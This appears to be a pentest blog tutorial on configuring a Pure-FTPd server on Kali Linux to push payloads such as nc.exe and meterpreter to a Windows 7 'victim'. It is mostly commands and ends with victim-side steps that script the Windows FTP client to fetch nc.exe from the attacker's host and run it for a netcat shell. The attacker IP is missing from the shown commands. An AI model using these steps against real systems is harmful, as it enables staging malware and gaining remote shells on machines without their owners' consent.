Create a FTP server to transfer Payloads with Kali Linux | Parrot-Sec OS

In this article, we will learn about creating an FTP server to transfer an advanced payload like meterpreter to the victim machine. This is very much convenient and reliable when transferring to the Windows machine as FTP client is already installed and enabled in all of them.


FTP is an acronym of the file transfer protocol. This protocol allows us to upload and download a file from the FTP server with or without authentication. FTP works on TCP protocol, which provides a reliable means for the transfer of data.

Attacker IP address:
Tools using:
Kali Linux as OS
Pure-ftpd as FTP server
Windows7 OS as the victim
To install and configure the FTP server on Kali Linux we will need to install the pure-ftpd server on it, as Kali does not preinstall any FTP server into it.
[root@PentestPundit:~]apt-get install pure-ftpd

Now we have to create a system user and a group that will represent virtual FTP users when he gets logged in. We will give a null shell and null directory to the user-created for the FTP server. Check the newly created FTP user with id command.
root@PentestPundit:~]groupadd ftpgroup
[root@PentestPundit:~]useradd -g ftpgroup -s /dev/null -d /dev/null ftpuser
[root@PentestPundit:~]id ftpuser
uid=1001(ftpuser) gid=1001(ftpgroup) groups=1001(ftpgroup)

Now create a home directory for the FTP user. Here we create a separate directory in root-filesystem and changed the owner to the (ftpuser) system user we already created. Check the permissions with ls command.
[root@PentestPundit:~]mkdir /ftp-home
[root@PentestPundit:~]chown -R ftpuser:ftpgroup /ftp-home/
[root@PentestPundit:~]ls -la /ftp-home/

Find Netcat windows executable in Kali with these commands and copy nc.exe file to our ftp-home directory.
[root@PentestPundit:~]locate nc.exe
[root@PentestPundit:~]cp /usr/share/windows-resources/binaries/nc.exe /ftp-home/nc.exe

Now create an actual FTP user that gets logged in remotely.
[root@PentestPundit:~]pure-pw useradd pentester -u ftpuser -d /ftp-home/
Enter it again:
[root@PentestPundit:~]pure-pw mkdb

Pure-FTPD supports multiple backend database systems. We will use default here.
[root@PentestPundit:~]cd /etc/pure-ftpd/auth/
[root@PentestPundit:/etc/pure-ftpd/auth]ln -s ../conf/PureDB 60pdb

Now start the Pure-ftpd service and check that port 21 is listening or not.
[root@PentestPundit:/etc/pure-ftpd/auth]service pure-ftpd start
[root@PentestPundit:/etc/pure-ftpd/auth]netstat -antlp | grep 21

On Victim Shell:

On victim shell, create a text file with the command-line shell with following commands in it. Then provide this text file as a file containing FTP commands to the victim's FTP client.
c:\> echo open 21> ftp.txt
c:\> echo USER pentester>> ftp.txt
c:\> echo pentester>> ftp.txt
c:\> echo bin >> ftp.txt
c:\> echo GET nc.exe >> ftp.txt
c:\> echo bye >> ftp.txt
c:\> ftp -v -n -s:ftp.txt
Now you can see that nc.exe file will get downloaded into our current directory and we can execute that file to get more advanced shell with netcat.

No comments:

Post a Comment